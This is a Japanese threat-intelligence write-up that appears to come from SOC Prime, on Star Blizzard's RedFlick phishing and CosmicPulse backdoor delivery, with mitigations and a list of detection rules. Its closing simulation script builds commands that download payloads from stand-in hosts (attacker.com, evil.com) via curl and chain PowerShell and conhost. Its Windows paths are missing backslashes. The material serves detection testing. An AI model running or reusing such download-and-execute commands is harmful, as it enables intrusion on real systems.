SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

スター・ブリザード、フィッシングとマルウェア展開の強化にRedFlickを使用

Author Photo
SOC Prime Team linkedin icon フォローする
スター・ブリザード、フィッシングとマルウェア展開の強化にRedFlickを使用
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

ロシア政府支援のアクターStar Blizzardが詳細構造を進化させ、RedFlick手法を用いてCosmicPulseバックドアを配信しています。このアクターは、非常に特化したスピアフィッシングから、侵害されたウェブサイトを使用した大規模な自動フィッシングキャンペーンに移行しました。これらのキャンペーンは、PDFファイル内に隠されたペイロードやVHDXファイルを含む高度な配信方法を利用して検出を回避します。

調査

Microsoft Threat Intelligenceは、2026年に観察されたさまざまなフィッシング波を分析し、ClickFixベースのチェーンからRedFlickスケジュールタスクへの移行を特定しました。この調査は、LNKファイル、SSHローカルコマンド実行、WebDAVを使用したリモートペイロード取得を含む多段階実行フローを詳述しています。技術分析では、CosmicPulseペイロードのステガノグラフィおよびレジストリベースの暗号化の使用も発見されました。

緩和策

組織は、フィッシングに強い認証と条件付きアクセスポリシーを実装してIDを保護する必要があります。エンドポイント保護はEDRをブロックモードで設定し、リアルタイムのウイルス対策保護を有効にする必要があります。さらに、攻撃表面低減ルールを実装して、難読化されたスクリプトや無許可の実行ファイルの実行を防ぐことができます。

対応

検出時には、セキュリティチームはEDRを活用して悪意のあるアーティファクトを修復し、疑わしいサインイン試行を調査する必要があります。自動調査と修復モードを有効にして応答時間を短縮します。組織はまた、高度なアンチフィッシングソリューションとゼロアワー自動削除(ZAP)を使用して、受信する悪意のある通信を無力化するべきです。

攻撃フロー

この部分はまだ更新中です。

検出

疑わしいコマンドラインでUNCパスが引数として実行ファイルを含む(cmdlineによる)

SOC Primeチーム
2026年9月30日

可能なネットワーク共有の発見(cmdlineによる)

SOC Primeチーム
2026年9月30日

疑わしいMsiExecリモートインストーラー隠しインストールの試み(cmdlineによる)

SOC Primeチーム
2026年9月30日

LOLBAS Conhost(cmdlineによる)

SOC Primeチーム
2026年9月30日

トンネリングツール使用の可能性 [Windows](cmdlineによる)

SOC Primeチーム
2026年9月30日

疑わしいCURL使用(cmdlineによる)

SOC Primeチーム
2026年9月30日

疑わしいコマンド&コントロールによる異常なトップレベルドメイン(TLD)DNSリクエスト(dnsによる)

SOC Primeチーム
2026年9月30日

IOC(HashSha256)で検出: Star BlizzardがRedFlick技術でフィッシングとマルウェア配送を洗練

SOC Prime AIルール
2026年9月30日

IOC(SourceIP)で検出: Star BlizzardがRedFlick技術でフィッシングとマルウェア配送を洗練

SOC Prime AIルール
2026年9月30日

IOC(DestinationIP)で検出: Star BlizzardがRedFlick技術でフィッシングとマルウェア配送を洗練

SOC Prime AIルール
2026年9月30日

PowerShell実行の検出PDFからのダウンロード [Windows Powershell]

SOC Prime AIルール
2026年9月30日

Star Blizzard RedFlick技術の検出 – スケジュールされたタスクとコマンドライン実行 [Windowsプロセス作成]

SOC Prime AIルール
2026年9月30日

シミュレーション実行

  • 攻撃ストーリー&コマンド: 敵対者は、悪意のあるファイルへのリンクを含むフィッシングメールを配信します。インタラクションすると、次の段階がトリガーされ、 curl が使用され、次段階がフェッチされます。システムプロセスに溶け込むために、コマンドは PowerShell, PDF (トリガーのソースを参照)と conhost.exe のロジックに合うようにコマンドライン文字列に組み込まれています。目標は、PDF構造内に埋め込まれたデコードされたペイロードを実行することです。

  • 回帰テストスクリプト:

    # 'Detect PowerShell Execution from Download PDF'ルールをトリガーするシミュレーションスクリプト。
    # すべての必要なキーワードを含むコマンドライン文字列を構築します。
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'PDFから抽出中...'; Start-Process conhost.exe}"
    
    # プロセスツリー/コマンドコンテキストにconhost.exeが含まれるようにcmdを介して実行
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"PDFから抽出中... using conhost.exe`""
  • クリーンアップコマンド:

    # シミュレーション中に生成されたファイルをクリーンアップ
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue